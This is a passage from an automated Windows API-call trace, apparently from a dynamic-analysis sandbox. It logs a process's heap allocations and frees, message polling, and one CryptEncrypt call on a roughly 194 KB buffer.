lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0162.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0162.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0162.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0162.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0162.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.335] CharLowerBuffW (in: lpsz="byte[194056]", cchLength=0xc | out: lpsz="byte[194056]") returned 0xc [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0162.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0162.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0162.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0162.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0162.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3bf0050 [0162.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0162.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0162.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0162.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0162.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0162.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0162.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0162.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0162.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x3c1f660 [0162.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0162.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x3c8e010 [0162.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0162.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.552] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0162.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0162.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0162.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0162.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0162.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0162.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0162.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a70 [0162.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.560] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0162.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540a8 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0162.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0162.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0162.561] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x2f600, dwBufLen=0x2f608 | out: pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x2f608) returned 1 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0162.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0162.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0162.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0162.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0162.735] RtlAllocateHeap 